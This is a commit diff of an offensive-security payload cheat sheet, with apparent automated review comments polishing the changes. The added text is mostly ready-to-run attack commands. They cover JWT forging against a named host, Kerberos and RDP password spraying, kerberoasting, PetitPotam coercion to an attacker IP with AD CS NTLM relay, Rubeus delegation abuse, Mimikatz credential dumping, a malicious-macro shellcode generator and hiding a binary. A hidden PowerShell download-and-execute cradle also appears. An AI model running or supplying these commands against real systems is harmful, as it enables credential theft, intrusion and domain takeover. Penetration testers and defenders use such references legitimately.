mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git, synced 2024-12-18 10:26:09 +00:00
DB2 Injection + ADCS
parent 01f2a02c52
commit 87be30d3b2
@ -6,6 +6,8 @@
|
||||
|
||||
- [Tools](#tools)
|
||||
- [JWT Format](#jwt-format)
|
||||
- [Header](#header)
|
||||
- [Payload](#payload)
|
||||
- [JWT Signature - None algorithm](#jwt-signature---none-algorithm)
|
||||
- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256)
|
||||
- [Breaking JWT's secret](#breaking-jwts-secret)
|
||||
@ -188,6 +190,7 @@ First, bruteforce the "secret" key used to compute the signature.
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/ticarpi/jwt_tool
|
||||
python3 -m pip install termcolor cprint pycryptodomex requests
|
||||
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
|
||||
|
||||
\ \ \ \ \ \
|
||||
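Review bot: the added `python3 -m pip install termcolor cprint pycryptodomex requests` line installs unpinned packages into the system interpreter; prefer a virtualenv and the project's own requirements file (`python3 -m pip install -r requirements.txt` from inside the cloned `jwt_tool` directory, if the project ships one) so the versions match what the tool was tested with. The fence is also tagged `powershell` although the three lines are `git`/`pip`/`python3` shell commands; `bash` is the accurate tag.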
@ -249,6 +252,13 @@ Your new forged token:
|
||||
[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
|
||||
```
|
||||
|
||||
* Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`
|
||||
* Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`
|
||||
* Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
|
||||
* Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`
|
||||
* Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
|
||||
|
||||
|
||||
### JWT cracker
|
||||
|
||||
```bash
|
||||
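Review bot: the `Review` bullet is byte-for-byte identical to the `Exploitation` bullet (same `-X i -I -pc name -pv admin` invocation against the same cookie), so it documents nothing new; either drop it or show the flags that distinguish a review run. The five bullets are also placed directly after the closing fence without a blank line, which some Markdown renderers fold into the preceding code block.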
@ -266,6 +276,14 @@ Secret is "Sn1f"
|
||||
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||
```
|
||||
|
||||
## CVE
|
||||
|
||||
* CVE-2015-2951 - The alg=none signature-bypass vulnerability
|
||||
* CVE-2016-10555 - The RS/HS256 public key mismatch vulnerability
|
||||
* CVE-2018-0114 - Key injection vulnerability
|
||||
* CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
|
||||
* CVE-2020-28042 - Null signature vulnerability
|
||||
|
||||
## References
|
||||
|
||||
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
||||
|
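Review bot: each entry in the new `## CVE` section names only the bug class (`alg=none signature-bypass`, `RS/HS256 public key mismatch`, ...) but not the affected library or version, so a reader cannot tell which implementation to check or patch; add the product and a link per entry, in the same `[title](url)` style the References section below uses. Two blank lines separate `## CVE` from the code block above; one is enough for consistency with the rest of the file.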
@ -81,6 +81,8 @@
|
||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
|
||||
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||
- [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation)
|
||||
- [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation)
|
||||
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
|
||||
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||
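Review bot: the new TOC entry `[MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation)` will not resolve. The heading added later in this commit is `#### MS-EFSRPC Abuse with Unconstrained Delegation`, and a hyphen inside a word is kept as a single `-` in the generated slug; the `---` form only appears where the heading contains ` - ` with spaces, as in the `SID Hijacking` and `Trust Ticket` entries above. The anchor should be `#ms-efsrpc-abuse-with-unconstrained-delegation`.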
@ -1058,65 +1060,64 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||
|
||||
Most of the time the best passwords to spray are :
|
||||
|
||||
- P@ssw0rd01, Password123, mimikatz
|
||||
- P@ssw0rd01, Password123, Password1, Hello123, mimikatz
|
||||
- Welcome1/Welcome01
|
||||
- $Companyname1 : $Microsoft1
|
||||
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
|
||||
- SeasonYear : Winter2019*, Spring2020!, Summer2018?, Summer2020, July2020!
|
||||
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
|
||||
|
||||
|
||||
#### Kerberos pre-auth bruteforcing
|
||||
|
||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
|
||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
||||
|
||||
```powershell
|
||||
# Username bruteforce
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||
|
||||
# Password brute
|
||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||
|
||||
# Password spray
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||
```
|
||||
* Username bruteforce
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||
```
|
||||
* Password bruteforce
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||
```
|
||||
* Password spray
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||
```
|
||||
|
||||
#### Spray a pre-generated passwords list
|
||||
|
||||
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||
|
||||
```powershell
|
||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||
```
|
||||
|
||||
Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
||||
|
||||
```powershell
|
||||
# https://github.com/dafthack/DomainPasswordSpray
|
||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||
|
||||
# /!\ be careful with the account lockout !
|
||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||
|
||||
```
|
||||
* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||
```powershell
|
||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||
```
|
||||
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
||||
```powershell
|
||||
# https://github.com/dafthack/DomainPasswordSpray
|
||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||
# /!\ be careful with the account lockout !
|
||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||
```
|
||||
* Using `SMBAutoBrute`.
|
||||
```powershell
|
||||
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
||||
```
|
||||
|
||||
#### Spray passwords against the RDP service
|
||||
|
||||
Using RDPassSpray to target RDP services.
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/xFreed0m/RDPassSpray
|
||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
||||
```
|
||||
|
||||
Using hydra and ncrack to target RDP services.
|
||||
|
||||
```powershell
|
||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
||||
```
|
||||
* Using RDPassSpray to target RDP services.
|
||||
```powershell
|
||||
git clone https://github.com/xFreed0m/RDPassSpray
|
||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
||||
```
|
||||
* Using hydra and ncrack to target RDP services.
|
||||
```powershell
|
||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
||||
```
|
||||
|
||||
#### BadPwdCount attribute
|
||||
|
||||
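Review bot: both `ncrack –connection-limit 1 -vv --user administrator ...` lines in the RDP bullet use an en dash (U+2013) rather than `--`, so the option is not recognised and the command fails as pasted; write `--connection-limit 1`. While this hunk restructures the section into bullets, the lockout warning `# /!\ be careful with the account lockout !` stays attached only to the `DomainPasswordSpray` block although it applies to every spray command in the section (kerbrute `passwordspray`, the crackmapexec loop, SMBAutoBrute with its `-LockoutThreshold`); moving it to the top of `#### Spray a pre-generated passwords list` would make that clear.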
@ -1411,6 +1412,13 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service
|
||||
./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
|
||||
```
|
||||
|
||||
* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
|
||||
```powershell
|
||||
# for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute),
|
||||
# print the "kerberoast" hash, and delete the temporary SPN set for that operation
|
||||
targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
|
||||
```
|
||||
|
||||
|
||||
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
|
||||
|
||||
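Review bot: the `targetedKerberoast` block pastes the argparse usage synopsis (`targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] ...`) instead of a runnable command, unlike the `bifrost` entry just above and the rest of this section; replace it with an invocation built from the flags shown (for example `-v -d DOMAIN -u USER -p PASSWORD --dc-ip <ip>` with placeholders) and keep the synopsis, if at all, in a comment. The two-line comment describes the SPN write-and-delete behaviour without naming the switches that control it (`--only-abuse` / `--no-abuse` in the synopsis); mentioning them next to the comment would help.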
@ -1765,13 +1773,15 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
|
||||
|
||||
#### AD CS Relay Attack
|
||||
|
||||
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
||||
|
||||
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
||||
|
||||
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
||||
```powershell
|
||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation
|
||||
# template workstation, DomainController, Machine
|
||||
# Templates: workstation, DomainController, Machine; KerberosAuthentication
|
||||
|
||||
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
||||
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
||||
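Review bot: the comment `# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam` misspells the protocol; it is MS-EFSRPC, as the heading added later in this commit spells it. Smaller points in the same block: the two `ntlmrelayx.py` lines point at different paths (`ntlmrelayx.py` vs `./examples/ntlmrelayx.py`) and the template comment mixes `,` and `;` as separators (`workstation, DomainController, Machine; KerberosAuthentication`); one path and one separator would read cleaner. `Require [Impacket PR #1101]` should be `Requires`.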
@ -2289,6 +2299,22 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
|
||||
* Ensure sensitive accounts cannot be delegated
|
||||
* Disable the Print Spooler Service
|
||||
|
||||
|
||||
#### MS-EFSRPC Abuse with Unconstrained Delegation
|
||||
|
||||
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
||||
|
||||
```powershell
|
||||
# Coerce the callback
|
||||
git clone https://github.com/topotam/PetitPotam
|
||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
|
||||
|
||||
# Extract the ticket
|
||||
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
||||
```
|
||||
|
||||
|
||||
### Kerberos Constrained Delegation
|
||||
|
||||
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
|
||||
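Review bot: the new `MS-EFSRPC Abuse with Unconstrained Delegation` block coerces the callback and then jumps to `.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt` under `# Extract the ticket`, but nothing in the block captures the forwarded TGT on the unconstrained-delegation host (the SpoolService section this one says it mirrors depends on a listener for that step); add the capture step or reference it explicitly. The previous section also closes with mitigation bullets (`Ensure sensitive accounts cannot be delegated`, `Disable the Print Spooler Service`); this one has none, and at least the delegation bullet applies unchanged, since disabling the spooler does not affect the EFSRPC coercion path.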
@ -2303,25 +2329,19 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
|
||||
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
#### Exploit with Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
#### Exploit the Constrained Delegation
|
||||
|
||||
[*] Getting TGT for user
|
||||
[*] Impersonating Administrator
|
||||
[*] Requesting S4U2self
|
||||
[*] Requesting S4U2Proxy
|
||||
[*] Saving ticket in Administrator.ccache
|
||||
```
|
||||
|
||||
#### Exploit with Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
* Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
```
|
||||
* Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
|
||||
#### Impersonate a domain user on a resource
|
||||
|
||||
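Review bot: in the rewritten `Exploit the Constrained Delegation` section the Rubeus bullet opens with `tgtdeleg /nowrap # this ticket can be used with /ticket:...`, but neither of the following `s4u` lines uses `/ticket:`; both authenticate with `/rc4:`. Either show the `/ticket:` variant of `s4u` or drop the `tgtdeleg` line so the comment does not dangle. The Impacket bullet also loses the expected `getST.py` output that the old block showed (`[*] Requesting S4U2self`, `[*] Requesting S4U2Proxy`, `[*] Saving ticket in Administrator.ccache`); those lines are useful for confirming a successful run and are worth keeping.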
@ -2851,4 +2871,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
||||
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
||||
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
|
||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
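Review bot: the added references duplicate an existing entry: `Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29` now appears twice in a row; keep one copy.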
@ -36,6 +36,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
||||
* [Persistence Kit](#persistence-kit)
|
||||
* [Resource Kit](#resource-kit)
|
||||
* [Artifact Kit](#artifact-kit)
|
||||
* [Mimikatz Kit](#mimikatz-kit)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -402,6 +403,8 @@ beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
|
||||
|
||||
## Kits
|
||||
|
||||
* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
|
||||
|
||||
### Elevate Kit
|
||||
|
||||
UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)
|
||||
@ -463,6 +466,12 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||
- Build the Artifact
|
||||
- Cobalt Strike -> Script Manager > Load .cna
|
||||
|
||||
### Mimikatz Kit
|
||||
|
||||
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
||||
* Load the mimikatz.cna aggressor script
|
||||
* Use mimikatz functions as normal
|
||||
|
||||
## References
|
||||
|
||||
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
|
||||
|
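Review bot: the first bullet of `### Mimikatz Kit` has an unbalanced parenthesis: `(Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)` opens two and closes one. The three steps also name no file location or menu (where the extracted `.tgz` goes, how `mimikatz.cna` is loaded), while the Artifact Kit section just above spells out `Cobalt Strike -> Script Manager > Load .cna`; reuse that wording.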
@ -17,6 +17,7 @@
|
||||
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)
|
||||
* [DOCM - winmgmts](#docm---winmgmts)
|
||||
* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde)
|
||||
* [DOCM - BadAssMacros](#docm---badassmacros)
|
||||
* [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module)
|
||||
* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec)
|
||||
* [VBA Obfuscation](#vba-obfuscation)
|
||||
@ -326,8 +327,7 @@ SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows
|
||||
|
||||
> Only the community version is available online.
|
||||
|
||||
* git clone https://github.com/sevagas/macro_pack
|
||||
* https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe
|
||||
* [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe)
|
||||
|
||||
```powershell
|
||||
# Options
|
||||
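Review bot: the replacement bullet `[https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe)` shows the repository URL as link text but points at a release binary, so a reader clicking what looks like the repo link downloads an executable. Keep the two links distinct, e.g. `[Repository](https://github.com/sevagas/macro_pack)` and `[macro_pack.exe v2.0.1](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe)`, and say that the binary link is pinned to v2.0.1.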
@ -385,6 +385,29 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
|
||||
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
||||
```
|
||||
|
||||
## DOCM - BadAssMacros
|
||||
|
||||
> C# based automated Malicous Macro Generator.
|
||||
|
||||
* https://github.com/Inf0secRabbit/BadAssMacros
|
||||
|
||||
```powershell
|
||||
BadAssMacros.exe -h
|
||||
|
||||
# Create VBA for classic shellcode injection from raw shellcode
|
||||
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s classic -c <caesar_shift_value> -o <path_to_output_file>
|
||||
BadAssMacros.exe -i .\Desktop\payload.bin -w doc -p no -s classic -c 23 -o .\Desktop\output.txt
|
||||
|
||||
# Create VBA for indirect shellcode injection from raw shellcode
|
||||
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s indirect -o <path_to_output_file>
|
||||
|
||||
# List modules inside Doc/Excel file
|
||||
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -l
|
||||
|
||||
# Purge Doc/Excel file
|
||||
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_output_file> -m <module_name>
|
||||
```
|
||||
|
||||
|
||||
## DOCM - CACTUSTORCH VBA Module
|
||||
|
||||
|
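Review bot: `Malicous` in the `BadAssMacros` description should be `Malicious`. In the usage block, the `-p` switch flips between `no` (injection examples) and `yes` (list and purge examples) with no explanation, and `-c <caesar_shift_value>` appears only for the `classic` method; a one-line comment on what `-p` selects and when `-c` is required would make the block self-explanatory.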
@ -33,6 +33,7 @@ Mimikatz console (multiple commands)
|
||||
```powershell
|
||||
PS C:\temp\mimikatz> .\mimikatz
|
||||
mimikatz # privilege::debug
|
||||
mimikatz # log
|
||||
mimikatz # sekurlsa::logonpasswords
|
||||
mimikatz # sekurlsa::wdigest
|
||||
```
|
||||
|
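Review bot: the added `mimikatz # log` line has no comment; with no argument it writes every subsequent command and its output to `mimikatz.log` in the current directory, so the `sekurlsa::logonpasswords` and `sekurlsa::wdigest` output below lands in that file. State the filename (or pass one explicitly with `log <file>`) so readers know a credential-bearing file is created and where to look for it during clean-up or forensics.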
@ -3,6 +3,7 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Hide Your Binary](#hide-your-binary)
|
||||
* [Disable Windows Defender](#disable-windows-defender)
|
||||
* [Disable Windows Firewall](#disable-windows-firewall)
|
||||
* [Simple User](#simple-user)
|
||||
@ -34,6 +35,14 @@
|
||||
|
||||
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
||||
|
||||
## Hide Your Binary
|
||||
|
||||
> Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file.
|
||||
|
||||
```ps1
|
||||
PS> attrib +h mimikatz.exe
|
||||
```
|
||||
|
||||
## Disable Windows Defender
|
||||
|
||||
```powershell
|
||||
|
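Review bot: the `## Hide Your Binary` section should state what the hidden attribute does and does not buy: `attrib +h mimikatz.exe` only removes the file from a default directory listing; `dir /a:h`, `Get-ChildItem -Force`, Explorer with hidden items shown, and any file-system telemetry still see it, and the attribute change itself is an observable event. Without that caveat the heading overpromises. The blockquote is taken from the `attrib` documentation; cite the source as the other quoted descriptions in this file do.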
@ -35,27 +35,32 @@
|
||||
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
||||
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
||||
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
|
||||
* [EoP - Printers](#eop-printers)
|
||||
* [Universal Printer](#universal-printer)
|
||||
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
|
||||
* [EoP - Runas](#eop---runas)
|
||||
* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
|
||||
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
|
||||
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
|
||||
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
|
||||
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
|
||||
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
|
||||
* [EoP - Privileged File Write](#eop---privileged-file-write)
|
||||
* [DiagHub](#diaghub)
|
||||
* [UsoDLLLoader](#usodllloader)
|
||||
* [WerTrigger](#wertrigger)
|
||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
|
||||
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||
